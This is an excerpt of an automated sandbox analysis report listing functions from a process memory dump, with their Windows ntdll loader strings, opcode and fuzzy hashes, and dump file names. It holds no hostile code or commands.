                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                • API String ID: 0-4274184382
                                                                                                                                • Opcode ID: 5af2a148f9936991e49df0a7e0782b8878054a32672853d2cd6e0500dd97a7bb
                                                                                                                                • Instruction ID: 936d36b27511a4d06e7471f43dc58d276e2d01e08c86e3ead01749452db5675d
                                                                                                                                • Opcode Fuzzy Hash: 5af2a148f9936991e49df0a7e0782b8878054a32672853d2cd6e0500dd97a7bb
                                                                                                                                • Instruction Fuzzy Hash: 12416AB5A11345AFDB15CFA8DC85BAEBBB1FF48300F148129E806AB251DB75A941CF90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357BA1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 357BA229
                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 357BA21B
                                                                                                                                • @Sx5, xrefs: 357BA268
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @Sx5$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                • API String ID: 0-1027603848
                                                                                                                                • Opcode ID: b40eeb4a248f76f2c2e52fb56a8524039ea516ffab8262adbf44f32702df280e
                                                                                                                                • Instruction ID: 1d2fb5cf0b99e65c58a3223d350848305a446bbb26a26e0527f3ae52d3271058
                                                                                                                                • Opcode Fuzzy Hash: b40eeb4a248f76f2c2e52fb56a8524039ea516ffab8262adbf44f32702df280e
                                                                                                                                • Instruction Fuzzy Hash: 84419874A047459BEF01DF9AC880F9A7BB5BF85740F5040A5EC16DF2A0E7B6DA80CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpInitializeTls, xrefs: 35821851
                                                                                                                                • DLL "%wZ" has TLS information at %p, xrefs: 3582184A
                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 3582185B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                • API String ID: 0-931879808
                                                                                                                                • Opcode ID: 69a31b34f72d5b991f17e0e7b6ac834d0b4cd6069027024cebb5f01aee19f867
                                                                                                                                • Instruction ID: 8061d1c58decdaae942c6d1df5549f2fd4b1daa280bc18658d8e70337afd39ad
                                                                                                                                • Opcode Fuzzy Hash: 69a31b34f72d5b991f17e0e7b6ac834d0b4cd6069027024cebb5f01aee19f867
                                                                                                                                • Instruction Fuzzy Hash: 9431C472A11380FBFB10CB55D886FAAB7B9BB44754F110169E506BF580DB70BD8687A0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 358385AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 358385DE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                • API String ID: 0-702105204
                                                                                                                                • Opcode ID: b416a8fdccc9dba9939668a03a1e6487210b6e95c94fc4d869097faf0050e42a
                                                                                                                                • Instruction ID: 79d4dea4a26b4773d4de85d3ca3643e47f0ed5481188c99127c8c364681268e1
                                                                                                                                • Opcode Fuzzy Hash: b416a8fdccc9dba9939668a03a1e6487210b6e95c94fc4d869097faf0050e42a
                                                                                                                                • Instruction Fuzzy Hash: C601F27E21B3049FDB255A55E88DA9A3B76FF40290F400C78E4021A552EF20AC86CED4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357C51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@
                                                                                                                                • API String ID: 0-149943524
                                                                                                                                • Opcode ID: 97129374270b0a4e63aa92639ded1c04616c5395cae09549c99cd840abab8174
                                                                                                                                • Instruction ID: 3b88b3000509cfa25e92680c174664522a9fa1614f2f92b0112c07605490659e
                                                                                                                                • Opcode Fuzzy Hash: 97129374270b0a4e63aa92639ded1c04616c5395cae09549c99cd840abab8174
                                                                                                                                • Instruction Fuzzy Hash: 9C329FB46083118FD724CF15C480B6EB7E2FF88784F50499EF9869B690E776D944CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: e48e289ea4c0a624d914dd197acc717bb284a9e0a791a921902b1ef3e2e2da14
                                                                                                                                • Instruction ID: e22eceb75e083079eb38cfc1b80ef754dbf66989aef198a588b418dc1e073d1e
                                                                                                                                • Opcode Fuzzy Hash: e48e289ea4c0a624d914dd197acc717bb284a9e0a791a921902b1ef3e2e2da14
                                                                                                                                • Instruction Fuzzy Hash: B4318D35301B06EBEB55DF65C984E9AF7B6BF44B98F004155E9018BA50EBB0ED21CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3588B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RedirectedKey, xrefs: 3588B60E
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3588B5C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                • API String ID: 0-1388552009
                                                                                                                                • Opcode ID: deaa9f61d3584cafa6bbd4dd24e9255765d611be18c32f7f69fff990998f63d7
                                                                                                                                • Instruction ID: b04fe0c44d2e8300b7f6fdfd6b7497d26f37f92861ec50e74378431c30d7b84a
                                                                                                                                • Opcode Fuzzy Hash: deaa9f61d3584cafa6bbd4dd24e9255765d611be18c32f7f69fff990998f63d7
                                                                                                                                • Instruction Fuzzy Hash: 2B6116B5D00229EFDB11DF94D888ADEBFB9FB48701F50406AE415E7200DB359A45CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357CF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $$$
                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                • Opcode ID: 4eff8d9d3faac86037fcf3bbfaec62203ac9225d9fb848f0541633f170bba785
                                                                                                                                • Instruction ID: a98880d1ab188c41c8c72bd1a3dfe8fc3ba1149b748af334abfc6adc743a0239
                                                                                                                                • Opcode Fuzzy Hash: 4eff8d9d3faac86037fcf3bbfaec62203ac9225d9fb848f0541633f170bba785
                                                                                                                                • Instruction Fuzzy Hash: DB618A75A01B49CFEB20CFA4C588B9DB7F2FB44704F5044AAD515AF694CB74A982CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3584314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                • API String ID: 0-118005554
                                                                                                                                • Opcode ID: 547a14b377eaf5a18f3f0a70d78d70d0967b9b661a708611a8beb4ddb06ff08f
                                                                                                                                • Instruction ID: 47a31c2025b49107db47d1aeb8e29be42f91fe035dff7dc7489b4ef9473ef0ed
                                                                                                                                • Opcode Fuzzy Hash: 547a14b377eaf5a18f3f0a70d78d70d0967b9b661a708611a8beb4ddb06ff08f
                                                                                                                                • Instruction Fuzzy Hash: 6331EBB52087559BE311CB68D884B2AB7E8FF84750F9008A9FC658B390EF31DD45CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B06CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: z5$ z5
                                                                                                                                • API String ID: 0-83763479
                                                                                                                                • Opcode ID: 56e71b5a8d0011faef874e2c47448d71498f1bee2c33683e91dfbde45b4664fd
                                                                                                                                • Instruction ID: 091c4e3bb69b688b5454bed9a7a6b7deaa4003b3a09be634e1198a9882d5f1ef
                                                                                                                                • Opcode Fuzzy Hash: 56e71b5a8d0011faef874e2c47448d71498f1bee2c33683e91dfbde45b4664fd
                                                                                                                                • Instruction Fuzzy Hash: 1B31B176B08711AFDF12DE248898E5BB7A6AF846A0F014569FC159F310EB70DC058FA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .Local\$@
                                                                                                                                • API String ID: 0-380025441
                                                                                                                                • Opcode ID: 27b5631568585d3f4e43d6e8d110c56c96eb855173ec34e0baffcc6394d3d109
                                                                                                                                • Instruction ID: 23aab636229c90bcae2bc2728ebfb7c539a25e6202066b74481bd24d6957a140
                                                                                                                                • Opcode Fuzzy Hash: 27b5631568585d3f4e43d6e8d110c56c96eb855173ec34e0baffcc6394d3d109
                                                                                                                                • Instruction Fuzzy Hash: A0316EB5509305AFD311CF28C884E5BBBE9FB85754F40192EF9958B250DB35ED088B92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3582289F
                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 3582289A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                • Opcode ID: 30b78b844841da7e3bac7f0eb08112ffaa06372eaf859030af7b04936948bda3
                                                                                                                                • Instruction ID: 6e2aaf93f22b47d2486d8ec4a3fd152fec3514689734b96082266c91a266649c
                                                                                                                                • Opcode Fuzzy Hash: 30b78b844841da7e3bac7f0eb08112ffaa06372eaf859030af7b04936948bda3
                                                                                                                                • Instruction Fuzzy Hash: 1F112576B04308BFE7198A48CC42FAF7AE9EB85754F618069B905EF244DAB4DD0086A0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357EA4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                • Opcode ID: 6fa2b0f6d1b6396c54cf15472349029a3d7da37697e192217e88c29dcbe4f972
                                                                                                                                • Instruction ID: 2d9496d5db2fc44ed5e8eb8fc5a167b8db20c04f8c1f3db8d89894da7e48bef5
                                                                                                                                • Opcode Fuzzy Hash: 6fa2b0f6d1b6396c54cf15472349029a3d7da37697e192217e88c29dcbe4f972
                                                                                                                                • Instruction Fuzzy Hash: C401DCB2614700AFE311CF24CE09B1277F8EB80715F0189BAAA58CB590EB34E905CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357BC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: MUI
                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                • Opcode ID: ab6b1d3f29fc4d16fc6b1498d5bdfbf648e15118899d601d39acd242102f3d0e
                                                                                                                                • Instruction ID: 70a9f77755aba6d33326d52a913626b440b349c14f9471ae5fd812eb4aae8ad0
                                                                                                                                • Opcode Fuzzy Hash: ab6b1d3f29fc4d16fc6b1498d5bdfbf648e15118899d601d39acd242102f3d0e
                                                                                                                                • Instruction Fuzzy Hash: 9C8259B9E043199FEF14CFA9C880BDDB7B6BF48350F51816AE859AF250DBB09941CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B64F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3398443dda6914b6a1527fd84149a5c36f86909c57c59e80b987686734f1737c
                                                                                                                                • Instruction ID: b9d893a22aa8d5254fc81fa9bc2dc3dab94caddf5509e2b6859122d867cd73d4
                                                                                                                                • Opcode Fuzzy Hash: 3398443dda6914b6a1527fd84149a5c36f86909c57c59e80b987686734f1737c
                                                                                                                                • Instruction Fuzzy Hash: 0AE17D75608341CFDB14CF28C490A5ABBF2FF88358F05896DE5958B351DBB1E905CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357DE507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 076ae1a5ff4d72ce2ddd5bc2f07b5a76e99c0874bedc3ea587e8f3514e6dc8d5
                                                                                                                                • Instruction ID: 198a1cd80c0e1e1ee7a589148b2d457d4f3e6ed9857baa746b4a2e9961fd8fbb
                                                                                                                                • Opcode Fuzzy Hash: 076ae1a5ff4d72ce2ddd5bc2f07b5a76e99c0874bedc3ea587e8f3514e6dc8d5
                                                                                                                                • Instruction Fuzzy Hash: 4CA1E171F14314AFEB12CBA4C848B9EBBF5BB04798F010165ED11AB291DB789E40CBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B1051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: b07e4f9e3b42e2324096cf0b5ec0d7892046bfbc927d662b4a6115495091a91d
                                                                                                                                • Instruction ID: 2d7f8a321276be96a72d5e417d77547d0700d5feca5f22361e16b295e915262f
                                                                                                                                • Opcode Fuzzy Hash: b07e4f9e3b42e2324096cf0b5ec0d7892046bfbc927d662b4a6115495091a91d
                                                                                                                                • Instruction Fuzzy Hash: 5BB1F2B56093809FD754CF28C880A5AFBF1BB88304F54896EE89A9B351D771E945CF82
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B7623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 00223d6bb3b6dbe772f5bc05473ca8a3cdb00a609b404a5c3a07da5edf7878e4
                                                                                                                                • Instruction ID: 76573b3ff810c7254f446e8527e855726f8872bd9b5406a82fd40a6799e53ca6
                                                                                                                                • Opcode Fuzzy Hash: 00223d6bb3b6dbe772f5bc05473ca8a3cdb00a609b404a5c3a07da5edf7878e4
                                                                                                                                • Instruction Fuzzy Hash: 0A614275B04646AFDB08CF79C484A9DFBB6FF48344F24826AD419AB350DB74A9418BD0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: d7d10f89eeade260e3e30620d411d67773c474d38535c39f4a4ac680c60bc17a
                                                                                                                                • Instruction ID: de28117599185226e7c1978ca32a68b424eff605aeb130337c1f25c5c5a427b4
                                                                                                                                • Opcode Fuzzy Hash: d7d10f89eeade260e3e30620d411d67773c474d38535c39f4a4ac680c60bc17a
                                                                                                                                • Instruction Fuzzy Hash: 10418BB5A12704DFDB11DF25C954A49B7F7FF48364F20869AC0169F6A0DBB0AA41CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B4779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: 191af5c1489f07013237d51af6b798a149857ecd9f09bbca58f6865491c53652
                                                                                                                                • Instruction ID: ef321b18316490d29319778d4e4f4d4551c4d3fc0515aadd03f8dc80208dada8
                                                                                                                                • Opcode Fuzzy Hash: 191af5c1489f07013237d51af6b798a149857ecd9f09bbca58f6865491c53652
                                                                                                                                • Instruction Fuzzy Hash: 1141DF75A043419FDB15CF28D894B2ABBEBFF81390F10446DE9428F2A1DBB0E845CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357AB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
